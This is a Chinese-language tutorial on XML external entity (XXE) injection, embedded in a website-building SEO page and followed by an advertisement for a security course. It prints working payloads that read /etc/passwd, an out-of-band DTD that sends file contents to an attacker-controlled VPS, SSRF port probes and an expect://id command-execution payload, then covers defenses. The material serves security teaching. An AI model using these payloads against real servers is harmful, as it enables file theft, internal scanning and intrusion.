潍城营销型网站建设在网站加上一个模块怎么做
2026/2/6 5:12:12 网站建设 项目流程
潍城营销型网站建设,在网站加上一个模块怎么做,网站图标ico,网络搭建比赛目录 XXE XXE漏洞演示利用(任意文件读取) Blind OOB XXE 目录浏览和任意文件读取端口扫描远程代码执行XXE漏洞的挖掘 XXE的防御在学习XXE漏洞之前#xff0c;我们先了解下XML。传送门—— XML和JSON数据格式 那么什么是XXE漏洞呢#xff1f; 01 XXE XXE(XML External Ent…目录XXEXXE漏洞演示利用(任意文件读取)Blind OOB XXE目录浏览和任意文件读取 端口扫描 远程代码执行XXE漏洞的挖掘XXE的防御在学习XXE漏洞之前我们先了解下XML。传送门—— XML和JSON数据格式那么什么是XXE漏洞呢01XXEXXE(XML External Entity Injection)也就是XML外部实体注入XXE漏洞发生在应用程序解析XML输入时XML文件的解析依赖libxml 库而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用服务端解析用户提交的XML文件时未对XML文件引用的外部实体含外部一般实体和外部参数实体做合适的处理并且实体的URL支持 file:// 和 ftp:// 等协议导致可加载恶意外部文件 和 代码造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。XXE漏洞触发的点往往是可以上传xml文件的位置没有对上传的xml文件进行过滤导致可上传恶意xml文件那么如何构建外部实体注入呢方式一直接通过DTD外部实体声明?xml version1.0?!DOCTYPE a[ !ENTITY b SYSTEM file:///etc/passwd]ab;/a方式二(一般实体)通过DTD外部实体声明引入外部DTD文档再引入外部实体声明?xml version1.0?!DOCTYPE a [ !ENTITY b SYSTEM http://mark4z5.com/evil.dtd] ab;/a #而http://mark4z5.com/evil.dtd内容为!ENTITY b SYSTEM file:///etc/passwd方式三(参数实体)通过DTD外部实体声明引入外部DTD文档再引入外部实体声明?xml version1.0?!DOCTYPE a [ !ENTITY %b SYSTEM http://mark4z5.com/evil.dtd]a%b;/a #http://mark4z5.com/evil.dtd文件内容!ENTITY b SYSTEM file:///etc/passwdXXE是XML外部实体注入攻击XML中可以通过调用实体来请求本地或者远程内容和远程文件保护类似会引发相关安全问题例如敏感文件读取。支持的协议其中php支持的协议会更多一些但需要一定的扩展支持02XXE漏洞演示利用(任意文件读取)以下是一个简单的XML代码POST请求示例上述代码将交由服务器的XML处理器解析。代码被解释并有回显数据。这里我们引用外部DTD实体并且将 email 的值修改为引用外部实体的值 file; 因为返回包会返回email的值所以返回包会读取我们引用的 /etc/passwd 的值返回给我们造成了任意文件读取。利用详情XXE漏洞利用03Blind XXE如上例所示服务器将 /etc/passwd 文件的内容作为响应返回给我们的XXE。但是在大多数情况下即使服务器可能存在XXE漏洞服务器也不会向攻击者的浏览器返回任何响应。遇到这种情况可以实现OOB(out-of-band)信息传递和通过构造dtd从错误信息获取数据。无论是OOB、还是基于错误的方式都需要引入外部DTD文件。OOB(Out-Of-Band)我们可以使用 Blind XXE 漏洞来构建一条外带数据OOB(Out-Of-Band)通道来读取数据。错误获取数据通过构造dtd然后从错误中获取数据通过OOB进行目录浏览和任意文件读取注Linux机器可以目录浏览和任意文件读取Windows机器只能任意文件读取Blind XXE是由于虽然目标服务器加载了XML数据但是不回显读取的数据。那么我们是否可以想其他的办法将服务器读取的数据传送给我们的VPS呢于是我们想到了如下VPS的操作首先在我们的VPS上搭建一个Http服务然后创建一个xml.dtd文件内容如下!ENTITY % all !ENTITY #x25; send SYSTEM http://VPS的地址:2121/%file;%all;然后在VPS上用python在2121端口起另一个http服务POST提交的数据?xml version1.0?!DOCTYPE message [ !ENTITY % remote SYSTEM http://VPS的http服务/xml.dtd !ENTITY % file SYSTEM file:///C:/Users/mi/Desktop/1.txt %remote; %send;]但是如果读取的文件数据有空格的话这样的读不出来的所以我们可以用base64编码?xml version1.0?!DOCTYPE message [ !ENTITY % remote SYSTEM http://VPS的http服务/xml.dtd !ENTITY % file SYSTEM php://filter/readconvert.base64-encode/resourcefile:///C:/Users/mi/Desktop/1.txt %remote; %send;]然后对base64进行解码如果目标是JAVA环境的话建议采用FTP协议。相关文章利用Blind XXE Getshell端口扫描在第一个示例中我们通过URI将请求指向了/etc/passwd文件并最终成功的为我们返回了文件中的内容。除此之外我们也可以使用 http URI 并强制服务器向我们指定的端点和端口发送GET请求将 XXE 转换为SSRF服务器端请求伪造。以下代码将尝试与端口通信根据响应时间/长度攻击者将可以判断该端口是否已被开启。?xml version1.0?!DOCTYPE GVI [ !ENTITY xxe SYSTEM http://127.0.0.1:80 ]如下探测本地81端口是否开放如果不开放则响应时间比较久探测本地80端口开放响应时间很快速远程代码执行这种情况很少发生但有些情况下攻击者能够通过XXE执行代码这主要是由于配置不当/开发内部应用导致的。如果我们足够幸运并且PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上那么我们就可以执行如下的命令?xml version1.0?!DOCTYPE GVI [ !ELEMENT foo ANY !ENTITY xxe SYSTEM expect://id ]catalog core idtest101 authorJohn, Doe/author titleI love XML/title categoryComputers/category price9.99/price date2018-10-01/date descriptionxxe;/description /core/catalog响应{error: no results for description uid0(root) gid0(root) groups0(root)...04XXE漏洞的挖掘通过手工篡改网站中xml实体中的头部加入相关的读取文件或者是链接或者是命令执行等如file:///$path/file.txthttp://url/file.txt看看能否显示出来05XXE的防御XML解析库在调用时严格禁止对外部实体的解析。方案一使用开发语言提供的禁用外部实体的方法PHPlibxml_disable_entity_loader(true); JAVA:DocumentBuilderFactory dbf DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false); Pythonfrom lxml import etreexmlData etree.parse(xmlSource,etree.XMLParser(resolve_entitiesFalse))方案二过滤用户提交的XML数据关键词!DOCTYPE 和 !ENTITY 或者 SYSTEM和PUBLIC。参考文章XXE漏洞利用技巧从XML到远程代码执行xxe漏洞的学习与利用总结相关文章XXE之利用本地DTD进行文件读取Blind XXE详解与Google CTF一道题分析 从Blind XXE漏洞到读取Root文件的系统提权学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询